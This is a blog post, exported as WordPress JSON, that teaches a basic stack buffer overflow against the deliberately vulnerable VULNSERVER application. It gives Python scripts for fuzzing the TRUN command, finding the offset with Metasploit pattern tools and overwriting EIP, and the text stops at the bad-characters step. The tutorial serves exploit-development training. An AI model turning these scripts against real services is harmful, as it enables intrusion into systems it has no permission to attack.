{"id":918,"date":"2020-10-08T20:22:25","date_gmt":"2020-10-08T09:22:25","guid":{"rendered":"https:\/\/catharsis.net.au\/blog\/?p=918"},"modified":"2026-01-21T15:40:48","modified_gmt":"2026-01-21T04:40:48","slug":"basic-buffer-overflow-guide","status":"publish","type":"post","link":"https:\/\/catharsis.net.au\/blog\/basic-buffer-overflow-guide\/","title":{"rendered":"Basic Buffer Overflow Guide"},"content":{"rendered":"\n

A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. In this case, a buffer is a sequential section of memory allocated to contain anything from a character string to an array of integers. Writing outside the bounds of a block of allocated memory can corrupt data, crash the program, or cause the execution of malicious code. <\/p>\n\n\n\n

Steps below were performed on “VULNSERVER<\/strong>“.<\/p>\n\n\n\n

Let’s connect to the vulnserver.exe through Netcat & find out how the application responds:<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

We can understand by looking at it, that the application accepts some commands. Now, we need to perform these steps to get the buffer overflow attack working:<\/p>\n\n\n\n

1.) Spiking:<\/strong><\/p>\n\n\n\n

Spiking is done to figure out what is vulnerable. We can use a tool called \u201cgeneric_send_tcp\u201d to generate TCP connections with the vulnerable application. :<\/p>\n\n\n\n

\"\"
generic_send_tcp tool usage<\/figcaption><\/figure>\n\n\n\n

In a real pentest scenario, an exhaustive review of all the inputs is required, you might be given a list with all the inputs in case of white box testing, and if not so, it’s a very time-consuming process to figure out all the paths & vulnerable input. So during spiking, in .spk script, we have to try all commands and check at which command the application crashes, in this case, it came out to be TRUN command and .spk script at which the application is crashing looks something like this (example for vulnserver.exe), :<\/p>\n\n\n\n

s_readline();\ns_string(\"TRUN \");\ns_string_variable(\"0\");<\/code><\/pre>\n\n\n\n
We need to try all possible commands or injections to figure out at exactly which command the application is crashing, in case of vulnserver.exe, it is crashing on “TRUN” command. Once we figure that out we are good to go ahead with that.<\/p>\n\n\n\n
\n\n\n\n
2.) Fuzzing:<\/strong><\/p>\n\n\n\n
Once we have figured out which command is vulnerable (in this case it is “TRUN” command), we need to find approximately at how many bytes the application is crashing. For that purpose, I used following script:<\/p>\n\n\n\n
#!\/usr\/bin\/python\nimport sys, socket\nfrom time import sleep\n\n############### fuzzing script ##################\n\nbuffer = \"A\" * 100\n\nwhile True:\n        try:\n\n                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n                s.connect(('172.16.70.134',9999))\n\n                s.send(('TRUN \/.:\/' + buffer))\n                s.close\n                sleep(1)\n                buffer = buffer + \"A\"*100\n\n        except:\n                print \"Fuzzing crashed at %s bytes\" % str(len(buffer))\n                sys.exit()<\/code><\/pre>\n\n\n\n
After this script execution, the program crashes, and roughly we know at how many bytes does the program crashed.<\/p>\n\n\n\n
\"\"
For some reason my script didn’t crashed, after immediately killing I got 3200 bytes value.<\/figcaption><\/figure>\n\n\n\n
\n\n\n\n
3.) Finding the Offset:<\/strong><\/p>\n\n\n\n
Using the above value, we will use the tool \u201cpattern_create.rb\u201c to generate a pattern for those many bytes.<\/p>\n\n\n\n
-l is for length which we get approximately from the fuzzing:<\/p>\n\n\n\n
\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 3200<\/code><\/pre>\n\n\n\n
Once we have this pattern, we send this to the program by using the following python script & check what is the value you are getting in EIP there in immunity debugger.:<\/p>\n\n\n\n
#!\/usr\/bin\/python\nimport sys, socket\n\n############### finding the offset script ##################\n## Generate offset using pattern offset command\n\noffset = \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9\"\n\n\n\ntry:\n\n        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n        s.connect(('172.16.70.134',9999))\n        s.send(('TRUN \/.:\/' + offset))\n        s.close\n\n\nexcept:\n        print \"Error connecting to the server\"\n        sys.exit()<\/code><\/pre>\n\n\n\n
After running this script, the program crashed and we got this in EIP:<\/p>\n\n\n\n
\"\"
Value received in EIP: 386F4337<\/figcaption><\/figure>\n\n\n\n
so we now need to find that this value (386F4337) is exactly where in our pattern, it will indicate offset value. For that, we will be using \u201cpattern_offset.rb\u201d<\/p>\n\n\n\n
\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -l 3200 -q 386F4337\nsample output: \n \t[*] Exact match at offset 2003<\/code><\/pre>\n\n\n\n
So we know we need to have 2003 bytes written and then we will start writing to our EIP (Evil Instruction Pointer).<\/p>\n\n\n\n
\n\n\n\n
4.) Overwriting the EIP:<\/strong><\/p>\n\n\n\n
To test this value, we can use this script:<\/p>\n\n\n\n
#!\/usr\/bin\/python\nimport sys, socket\n\n############### OVERITING THE EIP ##################\n## this 2003 is the value we find from previos script for exact address.\n\nshellcode = \"A\" * 2003 + \"B\" * 4\n\ntry:\n\n        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n        s.connect(('172.16.70.134',9999))\n\n        s.send(('TRUN \/.:\/' + shellcode))\n        s.close\n\n\nexcept:\n        print \"Error connecting to the server\"\n        sys.exit()<\/code><\/pre>\n\n\n\n
After writing 2003 “A”, this script will write 4 “B” & if we see these 4 “B” in EIP, we have verified that we can write in EIP. The output from the following script:<\/p>\n\n\n\n
\"\"
We are now controlling the EIP<\/figcaption><\/figure>\n\n\n\n
\n\n\n\n
5.) Finding the bad characters:<\/strong><\/p>\n\n\n\n
\n
\n
\n
A bad character is essentially a rundown of undesirable characters that can break the shellcodes. There is no universal arrangement of bad characters, as we would presumably be starting to see, yet relying upon the application and the developer logic there is an alternate arrangement of bad characters for each program that we would experience. Thusly, we should discover the bad characters in each application before composing the shellcode.  <\/p>\n\n\n\n
\n
\n
Some of the very common bad characters are:<\/p>\n\n\n\n